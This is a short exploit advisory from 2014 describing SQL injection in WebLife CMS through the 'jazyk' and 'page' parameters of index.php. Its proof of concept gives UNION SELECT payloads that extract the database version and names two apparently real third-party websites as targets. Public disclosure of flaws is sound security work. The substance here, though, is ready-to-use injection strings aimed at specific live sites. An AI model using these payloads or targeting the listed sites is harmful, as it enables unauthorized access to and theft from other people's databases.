# Mulitple SQL Injection on WebLife CMS
# Risk: High
# CWE number: CWE-89
# Date: 09/04/2014
# Vendor: www.weblife.sk
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: index.php
# Exploit:  http://host/index.php?jazyk=[SQLI]
#              http://host/index.php?page=[SQLI]
# PoC: 

     - Target: www.arsstudionz.sk
     - Vuln. File: /index.php?jazyk= 
     - Exploit: null+union+select 1,2,3,version(),5,6,7,8,9
       
     - Target: www.nitriansketlaciarne.sk
     - Vuln. File: /index.php?page=
     - Exploit: null+union+select 1,2,version(),4,5,6,7,8,9